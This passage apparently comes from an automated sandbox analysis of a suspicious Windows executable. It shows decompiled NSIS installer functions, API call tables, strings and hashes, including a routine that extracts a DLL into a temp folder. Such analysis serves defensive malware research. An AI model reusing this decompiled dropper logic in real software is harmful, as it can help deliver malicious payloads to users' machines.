						E004059BF(_t84, E004054CC(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E00405513(_t78);
							goto L15;
						}
						_t96 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}



























                                                                    0x0040352c
                                                                    0x0040353d
                                                                    0x00403544
                                                                    0x00403546
                                                                    0x0040355a
                                                                    0x0040355f
                                                                    0x00403575
                                                                    0x0040357a
                                                                    0x00403580
                                                                    0x00403592
                                                                    0x00403592
                                                                    0x0040359d
                                                                    0x00403548
                                                                    0x00403553
                                                                    0x00403553
                                                                    0x004035a2
                                                                    0x004035ac
                                                                    0x004035b5
                                                                    0x004035c1
                                                                    0x00403647
                                                                    0x0040364f
                                                                    0x00403651
                                                                    0x00403657
                                                                    0x00403658
                                                                    0x00403658
                                                                    0x0040366e
                                                                    0x00403674
                                                                    0x00403682
                                                                    0x00403711
                                                                    0x00403719
                                                                    0x00403723
                                                                    0x00403728
                                                                    0x0040372e
                                                                    0x004037c0
                                                                    0x004037c5
                                                                    0x004037c7
                                                                    0x004037e3
                                                                    0x00000000
                                                                    0x004037e3
                                                                    0x004037c9
                                                                    0x004037cf
                                                                    0x004037d7
                                                                    0x004037d7
                                                                    0x00000000
                                                                    0x004037cf
                                                                    0x0040373c
                                                                    0x00403748
                                                                    0x0040374e
                                                                    0x00403750
                                                                    0x00403752
                                                                    0x00403755
                                                                    0x0040375e
                                                                    0x0040375e
                                                                    0x00403766
                                                                    0x0040376e
                                                                    0x00403770
                                                                    0x00403772
                                                                    0x00403777
                                                                    0x0040377d
                                                                    0x00403780
                                                                    0x00403786
                                                                    0x0040378d
                                                                    0x0040378d
                                                                    0x004037ac
                                                                    0x004037b6
                                                                    0x00000000
                                                                    0x004037bb
                                                                    0x0040371b
                                                                    0x0040371d
                                                                    0x00000000
                                                                    0x00403688
                                                                    0x00403688
                                                                    0x0040368e
                                                                    0x00403698
                                                                    0x004036a0
                                                                    0x004036aa
                                                                    0x004036b0
                                                                    0x004036be
                                                                    0x004037e8
                                                                    0x004037e8
                                                                    0x00000000
                                                                    0x004037e8
                                                                    0x004036c4
                                                                    0x004036cd
                                                                    0x0040370c
                                                                    0x00000000
                                                                    0x0040370c
                                                                    0x004035c7
                                                                    0x004035c7
                                                                    0x004035cc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004035d6
                                                                    0x004035e5
                                                                    0x004035ea
                                                                    0x004035f1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004035f5
                                                                    0x004035f7
                                                                    0x00403604
                                                                    0x00403604
                                                                    0x0040360c
                                                                    0x00403612
                                                                    0x0040363a
                                                                    0x00403642
                                                                    0x00000000
                                                                    0x00403624
                                                                    0x00403625
                                                                    0x0040362e
                                                                    0x00403634
                                                                    0x00403635
                                                                    0x00000000
                                                                    0x00403635
                                                                    0x00403630
                                                                    0x00403632
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403632
                                                                    0x00403612

                                                                    APIs
                                                                      • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
                                                                      • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
                                                                      • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
                                                                    • lstrcatA.KERNEL32(1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\AQJEKNHnWK.exe" ,00000000,00000000,C:\Users\user\AppData\Local\Temp\,00000020), ref: 0040359D
                                                                    • lstrlenA.KERNEL32(007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\AQJEKNHnWK.exe" ,00000000), ref: 00403607
                                                                    • lstrcmpiA.KERNEL32(?,.exe,007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage), ref: 0040361A
                                                                    • GetFileAttributesA.KERNEL32(007A1F20), ref: 00403625
                                                                    • LoadImageA.USER32 ref: 0040366E
                                                                    • RegisterClassA.USER32 ref: 004036B5
                                                                      • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
                                                                    • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036CD
                                                                    • CreateWindowExA.USER32 ref: 00403706
                                                                    • ShowWindow.USER32(00000005,00000000), ref: 0040373C
                                                                    • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040374E
                                                                    • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040375E
                                                                    • GetClassInfoA.USER32 ref: 0040376E
                                                                    • GetClassInfoA.USER32 ref: 0040377D
                                                                    • RegisterClassA.USER32 ref: 0040378D
                                                                    • DialogBoxParamA.USER32 ref: 004037AC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: 'z$"C:\Users\user\Desktop\AQJEKNHnWK.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$KERNEL32.dll$Locale$RichEd20.dll$RichEdit20A$_Nb
                                                                    • API String ID: 914957316-1550007566
                                                                    • Opcode ID: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
                                                                    • Instruction ID: 4e9c7f181e94f196de7c88ece58cce9fa533c44585b571451200f5668265d8f3
                                                                    • Opcode Fuzzy Hash: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
                                                                    • Instruction Fuzzy Hash: 5361C2B1504240BFE720AF699D45E2B3AACEB85759B00457FF941B22E2D73D9D018B2E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00402C37, Relevance: 35.2, APIs: 10, Strings: 10, Instructions: 195memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 79%
                                                                    			E00402C37(void* __eflags, signed int _a4) {
				struct HWND__* _v8;
				char _v12;
				long _v16;
				void* _v20;
				intOrPtr _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				long _t52;
				long _t56;
				void* _t62;
				intOrPtr* _t66;
				long _t67;
				long _t78;
				void* _t79;
				intOrPtr _t89;
				void* _t91;
				long _t92;
				void* _t93;
				signed int _t94;
				signed int _t95;
				void* _t97;
				long _t101;
				void* _t102;

				_v8 = 0;
				_t52 = GetTickCount();
				_v16 = 0;
				_v12 = 0;
				_t100 = "C:\\Users\\hardz\\Desktop";
				_t97 = _t52 + 0x3e8;
				GetModuleFileNameA( *0x7a2f80, "C:\\Users\\hardz\\Desktop", 0x400);
				_t91 = E00405690(_t100, 0x80000000, 3);
				_v20 = _t91;
				 *0x409020 = _t91;
				if(_t91 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405513(_t100);
				_t56 = GetFileSize(_t91, 0);
				 *0x79d938 = _t56;
				_t101 = _t56;
				if(_t56 <= 0) {
					L27:
					if( *0x7a2f8c == 0) {
						goto L33;
					}
					if(_v12 == 0) {
						L31:
						_t102 = GlobalAlloc(0x40, _v28);
						E004030FF( *0x7a2f8c + 0x1c);
						_push(_v28);
						_push(_t102);
						_push(0);
						_push(0xffffffff); // executed
						_t62 = E00402EBD(); // executed
						if(_t62 == _v28) {
							 *0x7a2f88 = _t102;
							if((_a4 & 0x00000002) != 0) {
								 *_t102 =  *_t102 | 0x00000008;
							}
							 *0x7a3020 =  *_t102 & 0x00000018;
							 *0x7a2f90 =  *_t102;
							if((_v48 & 0x00000001) != 0) {
								 *0x7a2f94 =  *0x7a2f94 + 1;
							}
							_t49 = _t102 + 0x44; // 0x44
							_t66 = _t49;
							_t93 = 8;
							do {
								_t66 = _t66 - 8;
								 *_t66 =  *_t66 + _t102;
								_t93 = _t93 - 1;
							} while (_t93 != 0);
							_t67 = SetFilePointer(_v20, 0, 0, 1); // executed
							 *(_t102 + 0x3c) = _t67;
							E00405670(0x7a2fa0, _t102 + 4, 0x40);
							return 0;
						}
						GlobalFree(_t102);
						goto L33;
					}
					E004030FF( *0x789930);
					if(E004030CD( &_v12, 4) == 0 || _v16 != _v12) {
						goto L33;
					} else {
						goto L31;
					}
				} else {
					do {
						_t92 = _t101;
						asm("sbb eax, eax");
						_t78 = ( ~( *0x7a2f8c) & 0x00007e00) + 0x200;
						if(_t101 >= _t78) {
							_t92 = _t78;
						}
						_t79 = E004030CD(0x795938, _t92); // executed
						if(_t79 == 0) {
							if(_v8 != 0) {
								DestroyWindow(_v8);
							}
							L33:
							return "The installer you are trying to use is corrupted or incomplete.\nThis could be the result of a damaged disk, a failed download or a virus.\n\nYou may want to contact the author of this installer to obtain a new copy.\n\nIt may be possible to skip this check using the /NCRC command line switch\n(NOT RECOMMENDED).";
						}
						if( *0x7a2f8c != 0) {
							if((_a4 & 0x00000002) == 0) {
								if(_v8 == 0) {
									if(GetTickCount() > _t97) {
										_v8 = CreateDialogParamA( *0x7a2f80, 0x6f, 0, E00402BAB, "verifying installer: %d%%");
									}
								} else {
									E00405CFC(0);
								}
							}
							goto L22;
						}
						E00405670( &_v48, 0x795938, 0x1c);
						_t94 = _v48;
						if((_t94 & 0xfffffff0) == 0 && _v44 == 0xdeadbeef && _v32 == 0x74736e49 && _v36 == 0x74666f73 && _v40 == 0x6c6c754e) {
							_t89 = _v24;
							if(_t89 > _t101) {
								goto L33;
							}
							_a4 = _a4 | _t94;
							_t95 =  *0x789930; // 0x30000
							 *0x7a2f8c = _t95;
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t24 = _t89 - 4; // 0x1c
								_t101 = _t24;
								if(_t92 > _t101) {
									_t92 = _t101;
								}
								goto L22;
							} else {
								break;
							}
						}
						L22:
						if(_t101 <  *0x79d938) {
							_v16 = E00405D2F(_v16, 0x795938, _t92);
						}
						 *0x789930 =  *0x789930 + _t92;
						_t101 = _t101 - _t92;
					} while (_t101 > 0);
					if(_v8 != 0) {
						DestroyWindow(_v8);
					}
					goto L27;
				}
			}






























                                                                    0x00402c42
                                                                    0x00402c45
                                                                    0x00402c4b
                                                                    0x00402c4e
                                                                    0x00402c51
                                                                    0x00402c64
                                                                    0x00402c6a
                                                                    0x00402c7d
                                                                    0x00402c82
                                                                    0x00402c85
                                                                    0x00402c8b
                                                                    0x00000000
                                                                    0x00402c8d
                                                                    0x00402c98
                                                                    0x00402ca0
                                                                    0x00402ca8
                                                                    0x00402cad
                                                                    0x00402caf
                                                                    0x00402dde
                                                                    0x00402de6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402deb
                                                                    0x00402e0f
                                                                    0x00402e1a
                                                                    0x00402e25
                                                                    0x00402e2a
                                                                    0x00402e2d
                                                                    0x00402e2e
                                                                    0x00402e2f
                                                                    0x00402e31
                                                                    0x00402e39
                                                                    0x00402e5e
                                                                    0x00402e64
                                                                    0x00402e66
                                                                    0x00402e66
                                                                    0x00402e72
                                                                    0x00402e79
                                                                    0x00402e7e
                                                                    0x00402e80
                                                                    0x00402e80
                                                                    0x00402e88
                                                                    0x00402e88
                                                                    0x00402e8b
                                                                    0x00402e8c
                                                                    0x00402e8c
                                                                    0x00402e8f
                                                                    0x00402e91
                                                                    0x00402e91
                                                                    0x00402e9b
                                                                    0x00402ea1
                                                                    0x00402eaf
                                                                    0x00000000
                                                                    0x00402eb4
                                                                    0x00402e3c
                                                                    0x00000000
                                                                    0x00402e3c
                                                                    0x00402df3
                                                                    0x00402e05
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402cb5
                                                                    0x00402cb5
                                                                    0x00402cba
                                                                    0x00402cbe
                                                                    0x00402cc5
                                                                    0x00402ccc
                                                                    0x00402cce
                                                                    0x00402cce
                                                                    0x00402cd6
                                                                    0x00402cdd
                                                                    0x00402e4d
                                                                    0x00402e52
                                                                    0x00402e52
                                                                    0x00402e42
                                                                    0x00000000
                                                                    0x00402e42
                                                                    0x00402ceb
                                                                    0x00402d70
                                                                    0x00402d75
                                                                    0x00402d87
                                                                    0x00402da3
                                                                    0x00402da3
                                                                    0x00402d77
                                                                    0x00402d78
                                                                    0x00402d78
                                                                    0x00402d75
                                                                    0x00000000
                                                                    0x00402d70
                                                                    0x00402cf8
                                                                    0x00402cfd
                                                                    0x00402d06
                                                                    0x00402d38
                                                                    0x00402d3d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402d43
                                                                    0x00402d46
                                                                    0x00402d50
                                                                    0x00402d56
                                                                    0x00402d5e
                                                                    0x00402d61
                                                                    0x00402d61
                                                                    0x00402d66
                                                                    0x00402d68
                                                                    0x00402d68
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402d56
                                                                    0x00402da6
                                                                    0x00402dac
                                                                    0x00402dbc
                                                                    0x00402dbc
                                                                    0x00402dbf
                                                                    0x00402dc5
                                                                    0x00402dc7
                                                                    0x00402dd3
                                                                    0x00402dd8
                                                                    0x00402dd8
                                                                    0x00000000
                                                                    0x00402dd3

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00402C45
                                                                    • GetModuleFileNameA.KERNEL32(C:\Users\user\Desktop,00000400,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402C6A
                                                                      • Part of subcall function 00405690: GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
                                                                      • Part of subcall function 00405690: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
                                                                    • GetFileSize.KERNEL32(00000000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402CA0
                                                                    • DestroyWindow.USER32(00000000,00795938,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402DD8
                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402E14
                                                                    Strings
                                                                    • Error launching installer, xrefs: 00402C8D
                                                                    • Inst, xrefs: 00402D19
                                                                    • The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t, xrefs: 00402E42
                                                                    • verifying installer: %d%%, xrefs: 00402D89
                                                                    • Null, xrefs: 00402D2F
                                                                    • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402C37
                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
                                                                    • "C:\Users\user\Desktop\AQJEKNHnWK.exe" , xrefs: 00402C41
                                                                    • C:\Users\user\Desktop, xrefs: 00402C51, 00402C5B, 00402C77, 00402C97
                                                                    • soft, xrefs: 00402D26
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$AllocAttributesCountCreateDestroyGlobalModuleNameSizeTickWindow
                                                                    • String ID: "C:\Users\user\Desktop\AQJEKNHnWK.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Null$The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t$soft$verifying installer: %d%%
                                                                    • API String ID: 2181728824-804238035
                                                                    • Opcode ID: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
                                                                    • Instruction ID: 2bc3342fd27a022da09e110317cf5b670322b105189d6b48e3606e9cef6b214d
                                                                    • Opcode Fuzzy Hash: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
                                                                    • Instruction Fuzzy Hash: 8561CE30900215EBDB219F64DE49B9EBBB4BF45714F20813AF900B22E2D7BC9D418B9C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040179D, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 151stringtimeCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 57%
                                                                    			E0040179D(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				long _t49;
				long _t62;
				signed char _t63;
				long _t64;
				void* _t66;
				long _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t82;
				CHAR* _t84;
				void* _t87;

				_t77 = __ebx;
				_t84 = E00402A9A(0x31);
				 *(_t87 - 0x34) = _t84;
				 *(_t87 + 8) =  *(_t87 - 0x24) & 0x00000007;
				_t33 = E00405538(_t84);
				_push(_t84);
				if(_t33 == 0) {
					lstrcatA(E004054CC(E004059BF(0x409c18, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c18);
					E004059BF();
				}
				E00405BFB(0x409c18);
				while(1) {
					__eflags =  *(_t87 + 8) - 3;
					if( *(_t87 + 8) >= 3) {
						_t66 = E00405C94(0x409c18);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t87 - 0x18);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t87 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t87 + 8) = _t72;
					}
					__eflags =  *(_t87 + 8) - _t77;
					if( *(_t87 + 8) == _t77) {
						_t63 = GetFileAttributesA(0x409c18); // executed
						_t64 = _t63 & 0x000000fe;
						__eflags = _t64;
						SetFileAttributesA(0x409c18, _t64); // executed
					}
					__eflags =  *(_t87 + 8) - 1;
					_t41 = E00405690(0x409c18, 0x40000000, (0 |  *(_t87 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t87 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t87 + 8) - _t77;
					if( *(_t87 + 8) != _t77) {
						E00404D62(0xffffffe2,  *(_t87 - 0x34));
						__eflags =  *(_t87 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t87 - 4)) = 1;
						}
						L31:
						 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t87 - 4));
						__eflags =  *0x7a3008;
						goto L32;
					} else {
						E004059BF(0x40a418, 0x7a4000);
						E004059BF(0x7a4000, 0x409c18);
						E004059E1(_t77, 0x40a418, 0x409c18, "C:\Users\hardz\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll",  *((intOrPtr*)(_t87 - 0x10)));
						E004059BF(0x7a4000, 0x40a418);
						_t62 = E004052BF("C:\Users\hardz\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll",  *(_t87 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x7a3008 =  *0x7a3008 + 1;
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c18);
								_push(0xfffffffa);
								E00404D62();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404D62(0xffffffea,  *(_t87 - 0x34));
				 *0x4092a0 =  *0x4092a0 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t87 - 8));
				_push( *((intOrPtr*)(_t87 - 0x1c)));
				_t43 = E00402EBD(); // executed
				 *0x4092a0 =  *0x4092a0 - 1;
				__eflags =  *(_t87 - 0x18) - 0xffffffff;
				_t82 = _t43;
				if( *(_t87 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t87 - 8), _t87 - 0x18, _t77, _t87 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t87 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t87 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t87 - 8)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffee);
					} else {
						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffe9);
						lstrcatA(0x409c18,  *(_t87 - 0x34));
					}
					_push(0x200010);
					_push(0x409c18);
					E004052BF();
					goto L29;
				}
				goto L33;
			}


















                                                                    0x0040179d
                                                                    0x004017a4
                                                                    0x004017ad
                                                                    0x004017b0
                                                                    0x004017b3
                                                                    0x004017b8
                                                                    0x004017c0
                                                                    0x004017dc
                                                                    0x004017c2
                                                                    0x004017c2
                                                                    0x004017c3
                                                                    0x004017c3
                                                                    0x004017e2
                                                                    0x004017ec
                                                                    0x004017ec
                                                                    0x004017f0
                                                                    0x004017f3
                                                                    0x004017f8
                                                                    0x004017fa
                                                                    0x004017fc
                                                                    0x00401801
                                                                    0x00401801
                                                                    0x0040180c
                                                                    0x0040180c
                                                                    0x0040181d
                                                                    0x0040181f
                                                                    0x0040181f
                                                                    0x00401820
                                                                    0x00401820
                                                                    0x00401823
                                                                    0x00401826
                                                                    0x00401829
                                                                    0x0040182f
                                                                    0x0040182f
                                                                    0x00401833
                                                                    0x00401833
                                                                    0x0040183b
                                                                    0x0040184a
                                                                    0x0040184f
                                                                    0x00401852
                                                                    0x00401855
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00401857
                                                                    0x0040185a
                                                                    0x004018b4
                                                                    0x004018b9
                                                                    0x004015ca
                                                                    0x004026da
                                                                    0x004026da
                                                                    0x0040292f
                                                                    0x00402932
                                                                    0x00402932
                                                                    0x00000000
                                                                    0x0040185c
                                                                    0x00401862
                                                                    0x0040186d
                                                                    0x0040187a
                                                                    0x00401885
                                                                    0x0040189b
                                                                    0x0040189b
                                                                    0x0040189e
                                                                    0x00000000
                                                                    0x004018a4
                                                                    0x004018a4
                                                                    0x004018a5
                                                                    0x004018c2
                                                                    0x00402938
                                                                    0x00402938
                                                                    0x00402938
                                                                    0x004018a7
                                                                    0x004018a7
                                                                    0x004018a8
                                                                    0x00401495
                                                                    0x00402293
                                                                    0x00402293
                                                                    0x00402293
                                                                    0x004018a5
                                                                    0x0040189e
                                                                    0x0040293a
                                                                    0x0040293e
                                                                    0x0040293e
                                                                    0x004018d2
                                                                    0x004018d7
                                                                    0x004018dd
                                                                    0x004018de
                                                                    0x004018df
                                                                    0x004018e2
                                                                    0x004018e5
                                                                    0x004018ea
                                                                    0x004018f0
                                                                    0x004018f4
                                                                    0x004018f6
                                                                    0x004018fe
                                                                    0x0040190a
                                                                    0x004018f8
                                                                    0x004018f8
                                                                    0x004018fc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004018fc
                                                                    0x00401913
                                                                    0x00401919
                                                                    0x0040191b
                                                                    0x00000000
                                                                    0x00401921
                                                                    0x00401921
                                                                    0x00401924
                                                                    0x0040193c
                                                                    0x00401926
                                                                    0x00401929
                                                                    0x00401932
                                                                    0x00401932
                                                                    0x00401941
                                                                    0x00401946
                                                                    0x0040228e
                                                                    0x00000000
                                                                    0x0040228e
                                                                    0x00000000

                                                                    APIs
                                                                    • lstrcatA.KERNEL32(00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017DC
                                                                    • CompareFileTime.KERNEL32(-00000014,?,Ivlfdpdlcleoxmzl,Ivlfdpdlcleoxmzl,00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401806
                                                                    • GetFileAttributesA.KERNELBASE(Ivlfdpdlcleoxmzl,Ivlfdpdlcleoxmzl,00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401829
                                                                    • SetFileAttributesA.KERNELBASE(Ivlfdpdlcleoxmzl,00000000), ref: 00401833
                                                                      • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                      • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                      • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                      • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
                                                                      • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                      • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                      • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                      • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
